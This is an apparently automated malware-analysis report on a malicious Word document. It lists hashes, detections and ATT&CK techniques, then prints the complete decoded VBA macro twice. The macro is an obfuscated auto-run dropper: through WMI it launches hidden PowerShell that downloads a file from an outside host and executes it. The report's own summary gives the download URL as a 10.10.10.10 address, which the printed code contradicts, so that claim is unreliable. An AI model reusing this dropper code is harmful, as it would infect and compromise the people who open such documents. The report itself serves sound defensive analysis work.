Office (OLE) malware analysis — malicious · a1ae7e25a6366a5f

MALICIOUS

Office (OLE)

58.5 KB Created: 2016-05-24 02:39:00 Authoring application: Microsoft Office Word First seen: 2019-03-18

MD5: 1ac2d41cc1329133b31e9861bd3a1d60 SHA-1: 6e6803bd5ff888e98eea9b035fdbd23c5b38aa34 SHA-256: a1ae7e25a6366a5f40263464f0ddfbc8bab042ee9f48247fd7d2759d5b5b1ce3

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros, specifically a Document_Open macro, which is designed to execute automatically when the document is opened. The script utilizes GetObject and CallByName functions, indicative of malicious activity. It also attempts to deobfuscate a URL, which is reconstructed as 'http://10.10.10.10/payload.exe', likely to download and execute a second-stage payload. The presence of a lure to enable macros further supports its role as a dropper.

Heuristics 8

ClamAV: Doc.Dropper.Agent-6609966-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6609966-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11869 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11869 bytes
SHA-256: `235f192f9fd51be7f50fd8e629b938a1bd98911f27fc1aa440609b3e34c63ffe`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() NZQKqDR.KjUkKq End Sub Attribute VB_Name = "NZQKqDR" Private Sub kuduCAOi(ByVal tnSlu As Boolean) oPRmuELT "KL", "3ejb" End Sub Private Function IbXfhxrJJc() As String rGOlje ucajllP "geF", 9495, "Ra" zmIjoW IbXfhxrJJc = "Sd" End Function Private Function edOcMf(ByVal VJPWRiqp As Integer, ByVal GzGGu As Integer) As String cwTuzIh hCaKEOVWe edOcMf = "7woXm" End Function Public Sub KjUkKq() QYovCspQ End Sub Private Sub QYovCspQ() Dim AxTlWNSO As String LfvRp = False On Error GoTo IHfNbKV Set hzqLURbz = GetObject(XRUBkqC.DTDSN("8/hVGO", "VwGihnVmGgVm8tGsh:\/\V.V\V/r8oVothG\Vci/mGvhO2:/W8hin83G2O_GPOr88oche8sO/sGSGtGar8tV/uph")) Set rxOeAtpbsz = hzqLURbz.SpawnInstance_ EdoCydMX = 8218 CallByName rxOeAtpbsz, XRUBkqC.DTDSN("0JmjA6Hv", "vSmhHo6w6WiHnHHd0owv"), 4, 0 Set dKTfQViYsS = GetObject(XRUBkqC.DTDSN("pax9zL1Gh", "waiGna9m1gGmptsG:aG\\h.xx\rGaooL1tp\c1aimavp2L:xWLpin9132x_zLPLroLzcLezssh")) dKTfQViYsS.Create DhusH, Null, rxOeAtpbsz Exit Sub IHfNbKV: End Sub Private Function qaxHHrOCC() As String FsJzcvSy 1330, "9Pwo" CsGwZeejaq "N2XQ" lgbrCrlAnY True, "" If EwlTvT("FVY6W", 4658) Then EkmYQ False End If qaxHHrOCC = "" End Function Private Function DhusH() As String Dim CwUNycyRG As Integer JeeWwjmGG = "Rz6yE" DhusH = XRUBkqC.DTDSN("916kKQX8U", "1pQo9w8eUrsKXheKkl8l.QKexKeKU X-E89xUecKuXKt9iQoQnP6Uo1li9cUyU KBKQyp9a8Qs6s1 K-W19inXd8oQ9wS98t8y1le9 6KHi9dkdK6enk UX-cKo8kmkma8n1Kd U8SUtXa6rtUU-SQkl8e6ekp 8-19s 131Q00U;8 68$fKiUl81en1a1m99e=1U[Skkys8KteQm1.1I8OX.UkP8at6hK]16::8GX9etXT8keUmpKFUkiXl1e9Na8mUe1Q(9);Xk(NKekw9-1O6kbjkeKc6tKK USyXUstKeKXmX.9N1etK.KXWe9bXC6Xl1iekn9tk)Q.88DoUUw8nklKokadQFKKiQl9e6('Qh6tUXtkpX:U//1Qpr1iU8nt1cKl1u86e8.kcKomKX/iXmKaKgUeQ6/6miQ1c9rkosKo9Xft8.KpknkgX1'6, 8$1fkKil86e6n8amUke)1Q;1(NXQe8w-QkObQjU1ec18tU 6-c1kom68 9WS11c6riXp89t.6KSQheQlXlkX).6XEUxeKKcU(K$fKiKl69en8a1kmeKQ)") End Function Attribute VB_Name = "XRUBkqC" Private Function YsrNkR(ByVal GaaosU As String, ByVal eJJMkQJd As String) As String Dim RqwvWLS As Integer If Not ZnSCpmO.rWjpxtn(eJJMkQJd, GaaosU) Then YsrNkR = GaaosU lfmln = "lCgM" End If End Function Private Sub EdMsmvLSh() UFOsQzczwN "HoM" StfbIw rlnOBtG CyrXo MJZjZDjH End Sub Private Function pOXdE() As Integer Dim jjYnIql As String WmXWPWnCL = "An" pOXdE = 1 End Function Public Function DTDSN(ByVal NQaOrcoA As String, ByVal XoNeBBU As String) As String Dim mNQFllxN As Integer, Hazlu As String For kmjFnY = pOXdE To ZnSCpmO.Bzrabcwj(XoNeBBU) DTDSN = ZnSCpmO.rMBxdHDFUD(DTDSN, YsrNkR(ZnSCpmO.FwmzNM(XoNeBBU, kmjFnY), NQaOrcoA)) Next End Function Private Sub xadVt(ByVal clOBHCJ As String, ByVal znVUjikyk As Integer) uHPjFY False, "rqFJ" NZGYizT End Sub Private Sub fpYmPb() YfzBXQ vIJFnzz If NwWBe Then OKcKxg uRqyg False, "WjG" Else QtxXxGQPK End If nwrztBd "tKrTg" SndKT hFMjkKf End Sub Private Function BXCFvWsGN(ByVal RydchSEuE As Integer, ByVal PuWCP As String) As Integer wqZJuMHO 4290, 4004 WWdolpcM KzSklnWw "fe", "egji", "" BXCFvWsGN = 5023 End Function Attribute VB_Name = "ZnSCpmO" Public Function FwmzNM(ByVal wGMAfDITku As String, ByVal RllOXB As Integer) As String Dim pxZSTSyLrK As Boolean Dim rrKREUZ As Integer FwmzNM = Mid(wGMAfDITku, RllOXB, 1) End Function Public Function rMBxdHDFUD(ByVal FuLEHSPoM As String, ByVal KBAdadFgm As String) As String rMBxdHDFUD = FuLEHSPoM & KBAdadFgm End Function Public Function Bzrabcwj(ByVal yUpWOs As String) As Integer Dim NGlcLUq As String Bzrabcwj = Len(yUpWOs) End Function Public Function rWjpxtn(ByVal vAoXjv As String, ByVal vESMq As String) As Boolean Dim YDkxM As Boolean, MRvwvJoo As Boolean vEWIlHD = "bVl7" rWjpxtn = InStr(1, vAoXjv, vESMq) <> 0 End Function ' Processing file: /opt/analyzer/scan_staging/c1296c ... (truncated)

SHA-256: 235f192f9fd51be7f50fd8e629b938a1bd98911f27fc1aa440609b3e34c63ffe

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
NZQKqDR.KjUkKq
End Sub

Attribute VB_Name = "NZQKqDR"
Private Sub kuduCAOi(ByVal tnSlu As Boolean)
oPRmuELT "KL", "3ejb"
End Sub
Private Function IbXfhxrJJc() As String
rGOlje
ucajllP "geF", 9495, "Ra"
zmIjoW
IbXfhxrJJc = "Sd"
End Function
Private Function edOcMf(ByVal VJPWRiqp As Integer, ByVal GzGGu As Integer) As String
cwTuzIh
hCaKEOVWe
edOcMf = "7woXm"
End Function
Public Sub KjUkKq()
QYovCspQ
End Sub
Private Sub QYovCspQ()
Dim AxTlWNSO As String
LfvRp = False
On Error GoTo IHfNbKV
Set hzqLURbz = GetObject(XRUBkqC.DTDSN("8/hVGO", "VwGihnVmGgVm8tGsh:\/\V.V\V/r8oVothG\Vci/mGvhO2:/W8hin83G2O_GPOr88oche8sO/sGSGtGar8tV/uph"))
Set rxOeAtpbsz = hzqLURbz.SpawnInstance_
EdoCydMX = 8218
CallByName rxOeAtpbsz, XRUBkqC.DTDSN("0JmjA6Hv", "vSmhHo6w6WiHnHHd0owv"), 4, 0
Set dKTfQViYsS = GetObject(XRUBkqC.DTDSN("pax9zL1Gh", "waiGna9m1gGmptsG:aG\\h.xx\rGaooL1tp\c1aimavp2L:xWLpin9132x_zLPLroLzcLezssh"))
dKTfQViYsS.Create DhusH, Null, rxOeAtpbsz
Exit Sub
IHfNbKV:
End Sub
Private Function qaxHHrOCC() As String
FsJzcvSy 1330, "9Pwo"
CsGwZeejaq "N2XQ"
lgbrCrlAnY True, ""
If EwlTvT("FVY6W", 4658) Then
EkmYQ False
End If
qaxHHrOCC = ""
End Function
Private Function DhusH() As String
Dim CwUNycyRG As Integer
JeeWwjmGG = "Rz6yE"
DhusH = XRUBkqC.DTDSN("916kKQX8U", "1pQo9w8eUrsKXheKkl8l.QKexKeKU X-E89xUecKuXKt9iQoQnP6Uo1li9cUyU KBKQyp9a8Qs6s1 K-W19inXd8oQ9wS98t8y1le9 6KHi9dkdK6enk UX-cKo8kmkma8n1Kd U8SUtXa6rtUU-SQkl8e6ekp 8-19s 131Q00U;8 68$fKiUl81en1a1m99e=1U[Skkys8KteQm1.1I8OX.UkP8at6hK]16::8GX9etXT8keUmpKFUkiXl1e9Na8mUe1Q(9);Xk(NKekw9-1O6kbjkeKc6tKK USyXUstKeKXmX.9N1etK.KXWe9bXC6Xl1iekn9tk)Q.88DoUUw8nklKokadQFKKiQl9e6('Qh6tUXtkpX:U//1Qpr1iU8nt1cKl1u86e8.kcKomKX/iXmKaKgUeQ6/6miQ1c9rkosKo9Xft8.KpknkgX1'6, 8$1fkKil86e6n8amUke)1Q;1(NXQe8w-QkObQjU1ec18tU 6-c1kom68 9WS11c6riXp89t.6KSQheQlXlkX).6XEUxeKKcU(K$fKiKl69en8a1kmeKQ)")
End Function

Attribute VB_Name = "XRUBkqC"
Private Function YsrNkR(ByVal GaaosU As String, ByVal eJJMkQJd As String) As String
Dim RqwvWLS As Integer
If Not ZnSCpmO.rWjpxtn(eJJMkQJd, GaaosU) Then
YsrNkR = GaaosU
lfmln = "lCgM"
End If
End Function
Private Sub EdMsmvLSh()
UFOsQzczwN "HoM"
StfbIw
rlnOBtG
CyrXo
MJZjZDjH
End Sub
Private Function pOXdE() As Integer
Dim jjYnIql As String
WmXWPWnCL = "An"
pOXdE = 1
End Function
Public Function DTDSN(ByVal NQaOrcoA As String, ByVal XoNeBBU As String) As String
Dim mNQFllxN As Integer, Hazlu As String
For kmjFnY = pOXdE To ZnSCpmO.Bzrabcwj(XoNeBBU)
DTDSN = ZnSCpmO.rMBxdHDFUD(DTDSN, YsrNkR(ZnSCpmO.FwmzNM(XoNeBBU, kmjFnY), NQaOrcoA))
Next
End Function
Private Sub xadVt(ByVal clOBHCJ As String, ByVal znVUjikyk As Integer)
uHPjFY False, "rqFJ"
NZGYizT
End Sub
Private Sub fpYmPb()
YfzBXQ
vIJFnzz
If NwWBe Then
OKcKxg
uRqyg False, "WjG"
Else
QtxXxGQPK
End If
nwrztBd "tKrTg"
SndKT
hFMjkKf
End Sub
Private Function BXCFvWsGN(ByVal RydchSEuE As Integer, ByVal PuWCP As String) As Integer
wqZJuMHO 4290, 4004
WWdolpcM
KzSklnWw "fe", "egji", ""
BXCFvWsGN = 5023
End Function

Attribute VB_Name = "ZnSCpmO"
Public Function FwmzNM(ByVal wGMAfDITku As String, ByVal RllOXB As Integer) As String
Dim pxZSTSyLrK As Boolean
Dim rrKREUZ As Integer
FwmzNM = Mid(wGMAfDITku, RllOXB, 1)
End Function
Public Function rMBxdHDFUD(ByVal FuLEHSPoM As String, ByVal KBAdadFgm As String) As String
rMBxdHDFUD = FuLEHSPoM & KBAdadFgm
End Function
Public Function Bzrabcwj(ByVal yUpWOs As String) As Integer
Dim NGlcLUq As String
Bzrabcwj = Len(yUpWOs)
End Function
Public Function rWjpxtn(ByVal vAoXjv As String, ByVal vESMq As String) As Boolean
Dim YDkxM As Boolean, MRvwvJoo As Boolean
vEWIlHD = "bVl7"
rWjpxtn = InStr(1, vAoXjv, vESMq) <> 0
End Function

' Processing file: /opt/analyzer/scan_staging/c1296c
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.